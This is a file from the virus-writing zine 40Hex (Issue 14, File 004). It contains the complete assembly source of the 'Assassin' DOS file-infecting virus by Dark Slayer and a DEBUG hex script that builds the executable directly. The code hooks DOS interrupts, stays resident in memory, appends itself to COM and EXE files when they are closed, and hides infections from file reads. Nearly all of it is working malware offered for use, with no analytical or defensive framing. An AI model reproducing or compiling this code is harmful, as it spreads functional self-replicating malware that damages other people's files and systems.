Copy Link
Add to Bookmark
Report
40Hex Issue 14 File 004
40Hex Number 14 Volume 5 Issue 1 File 004
; Assassin (Bug Fix version)
; by Dark Slayer
mem_size equ offset memory_end-offset start
mem_para equ (mem_size+0fh)/10h
low_mem_size equ mem_size+100h
low_mem_para equ (low_mem_size+0fh)/10h
vir_size equ offset vir_end-offset start
vir_sector equ (vir_size+1ffh+2)/200h
constant_size equ offset constant-offset start
.model tiny
.code
org 0
start:
xor di,di
mov dx,ds:[di+2]
sub dh,5
mov ah,26h
int 21h
mov bp,ds:[di+2ch]
mov ah,4ah
mov bx,low_mem_para
int 21h
mov ah,52h
int 21h
mov bx,es:[bx-2]
mov ax,cs
dec ax
mcb:
mov cx,ds
mov ds,bx
inc bx
mov dx,bx
add bx,ds:[di+3]
or bp,bp
jnz not_boot
cmp ax,bx
jne not_our_mcb
add word ptr ds:[di+3],low_mem_para+1
not_our_mcb:
cmp ax,cx
jne not_boot
mov ds:[di+1],dx
mov di,8
push ds
pop es
mov si,di
mov ds,ax
mov cx,di
rep movsb
push dx
add ax,10h+1
push ax
jmp short search
not_boot:
cmp byte ptr ds:[di],4dh
je mcb
cmp byte ptr ds:[di],5ah
je mcb
mov sp,low_mem_size
sub dx,mem_para+1
mov es,dx
sub dx,cx
dec dx
mov ds,cx
mov ds:[di+3],dx
mov si,100h
mov cx,vir_size
rep movs byte ptr es:[di],cs:[si]
push es
search:
mov ax,352ah
int 21h
pop ds
push ds
mov di,offset i21_table
mov ds:old2a[di]-i21_table,bx
mov ds:old2a[di+2]-i21_table,es
mov ah,25h
mov dx,offset int2a
int 21h
mov dx,bx
push es
pop ds
int 21h
pop es
lds si,es:[di]
search_table:
lodsw
search_table_:
dec si
cmp ax,8b2eh
jne search_table
lodsw
cmp ah,9fh
jne search_table_
movsw
scasw
lea ax,[si-1e0h]
stosw
xchg si,ax
mov word ptr ds:[si],0eacbh
mov word ptr ds:[si+2],offset i21_3e
mov ds:[si+4],es
mov byte ptr ds:[si+6],0eah
mov word ptr ds:[si+7],offset i21_3f
mov ds:[si+9],es
call set21
mov cx,bp
jcxz boot
mov ds,bp
xor si,si
l2:
lodsw
dec si
or ax,ax
jnz l2
lea dx,[si+3]
mov di,offset pcb+4+100h
push cs
pop es
mov ax,cs
stosw
scasw
stosw
scasw
stosw
mov ax,4b00h
mov bx,offset pcb+100h
int 21h
mov ah,4dh
int 21h
mov ah,4ch
int 21h
boot:
pop dx
mov ah,26h
int 21h
mov bl,3
mov ss:[bp+18h+5],bl
mov ax,1216h
int 2fh
inc bp
mov es:[di],bp
mov ss,dx
mov ds,dx
mov ax,4200h
mov bl,5
cwd
int 21h
mov ah,3fh
dec cx
inc dh
int 21h
mov ah,3eh
int 21h
push ds
pop es
push ds
push dx
retf
read_cmp proc
mov cx,vir_size
mov dx,cx
push cs
pop ds
call read
jc rc_exit
push cx
xor si,si
if (vir_size and 0ff00h) eq (constant_size and 0ff00h)
mov cl,constant_size and 0ffh
else
mov cx,constant_size
endif
compare:
lodsb
cmp al,ds:read_buffer[si-1]
loope compare
clc
pop cx
rc_exit:
ret
read_cmp endp
read proc
push bx
push dx
push ds
mov ax,1229h
int 2fh
pop ds
pop dx
pop bx
ret
read endp
write proc
mov bp,40h*2
i21_func proc
pop ax
push bx
push cs
push ax
push cs
pop ds
push ds:i21_far_jmp
les di,dword ptr ds:i21_table
push es
push es:[di+bp]
retf
i21_func endp
write endp
set2324_restore21 proc
push ds
mov si,23h*4
xor ax,ax
mov ds,ax
mov di,offset old23
push cs
pop es
mov ax,offset int23
mov bp,2
sm_23_1:
movsw
mov ds:[si-2],ax
movsw
mov ds:[si-2],cs
if ((int23-start) and 0ff00h) eq ((int24-start) and 0ff00h)
mov al,(offset int24-offset start) and 0ffh
else
mov ax,offset int24
endif
dec bp
jnz sm_23_1
mov si,di
push cs
pop ds
mov bp,-4
rs_1:
inc bp
inc bp
les di,dword ptr ds:i21_table
mov di,es:[di+bp+2+3eh*2]
movsb
movsw
jnz rs_1
pop ds
pop bp
pop ax
push es
push ax
get_sft proc
push bx
mov ax,1220h
int 2fh
mov bl,es:[di]
mov ax,1216h
int 2fh
pop bx
jmp bp
get_sft endp
set2324_restore21 endp
set21_restore23 proc
mov si,offset old23
push cs
pop ds
mov di,23h*4
xor cx,cx
mov es,cx
mov cl,4
rep movsw
push cs
pop es
set21 proc ; es = vir segment
push ax
mov bx,-4
mov di,offset i21_3e_data
mov cx,es:i21_far_jmp[di]-i21_3e_data
inc cx
sm_1:
inc bx
lds si,dword ptr es:i21_table
mov ax,ds:[si+bx+3+3eh*2]
mov si,ax
movsb
movsw
xchg si,ax
sub ax,cx
neg ax
mov byte ptr ds:[si],0e9h
mov ds:[si+1],ax
add cx,5
inc bx
jnz sm_1
pop ax
ret
set21 endp
set21_restore23 endp
i21_3e:
call set2324_restore21
jc jc_exit
push es
pop ds
cmp word ptr ds:[di],1
jne jne_exit
les ax,dword ptr ds:[di+28h]
mov dx,es
cmp ax,'OC'
jne exe
mov al,'M'
jmp short com
exe:
cmp ax,'XE'
jne jne_exit
com:
cmp dl,al
jne_exit:
jne jne_exit_
les ax,dword ptr ds:[di+11h]
cmp ax,vir_size
jc_exit:
jb jc_exit_
cmp ax,0ffffh-(vir_size+2)
ja jne_exit_
mov dx,es
or dx,dx
jne_exit_:
jnz i21_3e_exit
mov ds:[di+15h],dx
mov ds:[di+17h],dx
les si,dword ptr ds:[di+7]
les si,dword ptr es:[si+2]
add ax,si
dec ax
div si
mov cx,es
inc cx
div cl
or ah,ah
jz i21_3e_exit
sub cl,ah
cmp cl,vir_sector
jc_exit_:
jb i21_3e_exit
les ax,ds:[di+4]
push ax
push es
and ax,1000000000011100b
jnz close_
mov byte ptr ds:[di+2],2
mov ds:[di+4],al
call read_cmp
jbe close
mov si,cx
cmp_device:
dec si
lodsw
inc ax
loopnz cmp_device
jcxz not_device
dec ax
cmp ax,ds:[si]
je close
jmp short cmp_device
not_device:
mov ax,es:[di+11h]
mov es:[di+15h],ax
mov cx,vir_size+2
mov dx,offset id
call write
pop bx
jc close
sub es:[di+11h],ax
dec cx
dec cx
cwd
mov es:[di+15h],dx
call write
pop bx
close:
push es
pop ds
close_:
pop ds:[di+6]
pop ds:[di+4]
mov bp,0dh*2
call i21_func
pop bx
i21_3e_exit:
mov ax,1227h
int 2fh
jmp i21_3f_exit
i21_3f:
call set2324_restore21
les ax,dword ptr es:[di+15h]
push ax
push es
call read
pop bp
pop si
cmc
jnc jnc_exit
test word ptr es:[di+4],1000000000011000b
jnz jnz_3f_exit
or bp,bp
jnz_3f_exit:
jnz i21_3f_exit
sub si,vir_size
jnc_exit:
jae i21_3f_exit
xor cx,cx
xchg cx,es:[di+15h]
push cx
xor cx,cx
xchg cx,es:[di+17h]
push cx
push ax
push si
push dx
push ds
call read_cmp
pop ds
pop dx
jc i21_3f_exit_1
jne i21_3f_exit_1
push dx
push ds
push es
pop ds
mov ax,ds:[di+11h]
mov ds:[di+15h],ax
add word ptr ds:[di+11h],vir_size+2
mov cl,2
mov dx,offset read_buffer
push cs
pop ds
call read
pop ds
pop dx
jc i21_3f_exit_2
cmp word ptr cs:read_buffer,'SD'
je i21_3f_l0
mov ax,1218h
int 2fh
or byte ptr ds:[si+16h],1
jmp short i21_3f_exit_2
i21_3f_l0:
pop si
neg si
mov ax,es:[di+11h]
sub ax,si
mov es:[di+15h],ax
pop cx
push cx
push cx
cmp cx,si
jb i21_3f_l1
mov cx,si
i21_3f_l1:
call read
i21_3f_exit_2:
sub word ptr es:[di+11h],vir_size+2
i21_3f_exit_1:
pop ax
pop ax
pop es:[di+17h]
pop es:[di+15h]
i21_3f_exit:
call set21_restore23
push ax
mov ax,1218h
int 2fh
mov ax,ds:[si+16h]
shr ax,1
pop ax
mov ds:[si],ax
retf
int23:
call set21_restore23
jmp dword ptr cs:old23
int24:
xor ax,ax
iret
int2a:
pop cs:i21_table
pop cs:i21_table[2]
sub sp,4
jmp dword ptr cs:old2a
msg db ' This is [Assassin] written by Dark Slayer '
db 'in Keelung. Taiwan <R.O.C> '
constant:
pcb dw 0,80h,?,5ch,?,6ch,?
id db 'DS'
vir_end:
read_buffer db vir_size dup(?)
old2a dw ?,?
old23 dw ?,?
old24 dw ?,?
i21_3e_data db 3 dup(?)
i21_3f_data db 3 dup(?)
i21_table dw ?,?
i21_far_jmp dw ?
memory_end:
end start
----------------------
N assassin.com
E 0100 33 FF 8B 55 02 80 EE 05 B4 26 CD 21 8B 6D 2C B4
E 0110 4A BB 8A 00 CD 21 B4 52 CD 21 26 8B 5F FE 8C C8
E 0120 48 8C D9 8E DB 43 8B D3 03 5D 03 0B ED 75 24 3B
E 0130 C3 75 05 81 45 03 8B 00 3B C1 75 17 89 55 01 BF
E 0140 08 00 1E 07 8B F7 8E D8 8B CF F3 A4 52 05 11 00
E 0150 50 EB 24 80 3D 4D 74 C9 80 3D 5A 74 C4 BC 95 08
E 0160 83 EA 7B 8E C2 2B D1 4A 8E D9 89 55 03 BE 00 01
E 0170 B9 BF 03 F3 2E A4 06 B8 2A 35 CD 21 1F 1E BF 8F
E 0180 07 89 5D EE 8C 45 F0 B4 25 BA 57 03 CD 21 8B D3
E 0190 06 1F CD 21 07 26 C5 35 AD 4E 3D 2E 8B 75 F9 AD
E 01A0 80 FC 9F 75 F4 A5 AF 8D 84 20 FE AB 96 C7 04 CB
E 01B0 EA C7 44 02 EA 01 8C 44 04 C6 44 06 EA C7 44 07
E 01C0 A2 02 8C 44 09 E8 F6 00 8B CD E3 29 8E DD 33 F6
E 01D0 AD 4E 0B C0 75 FA 8D 54 03 BF B3 04 0E 07 8C C8
E 01E0 AB AF AB AF AB B8 00 4B BB AF 04 CD 21 B4 4D CD
E 01F0 21 B4 4C CD 21 5A B4 26 CD 21 B3 03 88 5E 1D B8
E 0200 16 12 CD 2F 45 26 89 2D 8E D2 8E DA B8 00 42 B3
E 0210 05 99 CD 21 B4 3F 49 FE C6 CD 21 B4 3E CD 21 1E
E 0220 07 1E 52 CB B9 BF 03 8B D1 0E 1F E8 11 00 72 0E
E 0230 51 33 F6 B1 AF AC 3A 84 BE 03 E1 F9 F8 59 C3 53
E 0240 52 1E B8 29 12 CD 2F 1F 5A 5B C3 BD 80 00 58 53
E 0250 0E 50 0E 1F FF 36 93 07 C4 3E 8F 07 06 26 FF 33
E 0260 CB 1E BE 8C 00 33 C0 8E D8 BF 81 07 0E 07 B8 4C
E 0270 03 BD 02 00 A5 89 44 FE A5 8C 4C FE B0 54 4D 75
E 0280 F3 8B F7 0E 1F BD FC FF 45 45 C4 3E 8F 07 26 8B
E 0290 7B 7E A4 A5 75 F2 1F 5D 58 06 50 53 B8 20 12 CD
E 02A0 2F 26 8A 1D B8 16 12 CD 2F 5B FF E5 BE 81 07 0E
E 02B0 1F BF 8C 00 33 C9 8E C1 B1 04 F3 A5 0E 07 50 BB
E 02C0 FC FF BF 89 07 26 8B 4D 0A 41 43 26 C5 36 8F 07
E 02D0 8B 40 7F 8B F0 A4 A5 96 2B C1 F7 D8 C6 04 E9 89
E 02E0 44 01 83 C1 05 43 75 E2 58 C3 E8 74 FF 72 24 06
E 02F0 1F 83 3D 01 75 15 C4 45 28 8C C2 3D 43 4F 75 04
E 0300 B0 4D EB 05 3D 45 58 75 02 3A D0 75 11 C4 45 11
E 0310 3D BF 03 72 2B 3D 3E FC 77 04 8C C2 0B D2 75 7A
E 0320 89 55 15 89 55 17 C4 75 07 26 C4 74 02 03 C6 48
E 0330 F7 F6 8C C1 41 F6 F1 0A E4 74 5F 2A CC 80 F9 02
E 0340 72 58 C4 45 04 50 06 25 1C 80 75 41 C6 45 02 02
E 0350 88 45 04 E8 CE FE 76 33 8B F1 4E AD 40 E0 FB E3
E 0360 07 48 3B 04 74 25 EB F2 26 8B 45 11 26 89 45 15
E 0370 B9 C1 03 BA BD 03 E8 D2 FE 5B 72 0F 26 29 45 11
E 0380 49 49 99 26 89 55 15 E8 C1 FE 5B 06 1F 8F 45 06
E 0390 8F 45 04 BD 1A 00 E8 B5 FE 5B B8 27 12 CD 2F E9
E 03A0 98 00 E8 BC FE 26 C4 45 15 50 06 E8 91 FE 5D 5E
E 03B0 F5 73 10 26 F7 45 04 18 80 75 02 0B ED 75 7B 81
E 03C0 EE BF 03 73 75 33 C9 26 87 4D 15 51 33 C9 26 87
E 03D0 4D 17 51 50 56 52 1E E8 4A FE 1F 5A 72 52 75 50
E 03E0 52 1E 06 1F 8B 45 11 89 45 15 81 45 11 C1 03 B1
E 03F0 02 BA BF 03 0E 1F E8 46 FE 1F 5A 72 2D 2E 81 3E
E 0400 BF 03 44 53 74 0B B8 18 12 CD 2F 80 4C 16 01 EB
E 0410 19 5E F7 DE 26 8B 45 11 2B C6 26 89 45 15 59 51
E 0420 51 3B CE 72 02 8B CE E8 15 FE 26 81 6D 11 C1 03
E 0430 58 58 26 8F 45 17 26 8F 45 15 E8 6F FE 50 B8 18
E 0440 12 CD 2F 8B 44 16 D1 E8 58 89 04 CB E8 5D FE 2E
E 0450 FF 2E 81 07 33 C0 CF 2E 8F 06 8F 07 2E 8F 06 91
E 0460 07 83 EC 04 2E FF 2E 7D 07 20 54 68 69 73 20 69
E 0470 73 20 5B 41 73 73 61 73 73 69 6E 5D 20 77 72 69
E 0480 74 74 65 6E 20 62 79 20 44 61 72 6B 20 53 6C 61
E 0490 79 65 72 20 69 6E 20 4B 65 65 6C 75 6E 67 2E 20
E 04A0 54 61 69 77 61 6E 20 3C 52 2E 4F 2E 43 3E 20 00
E 04B0 00 80 00 00 00 5C 00 00 00 6C 00 00 00 44 53
R CX
03BF
W
Q
----------------------
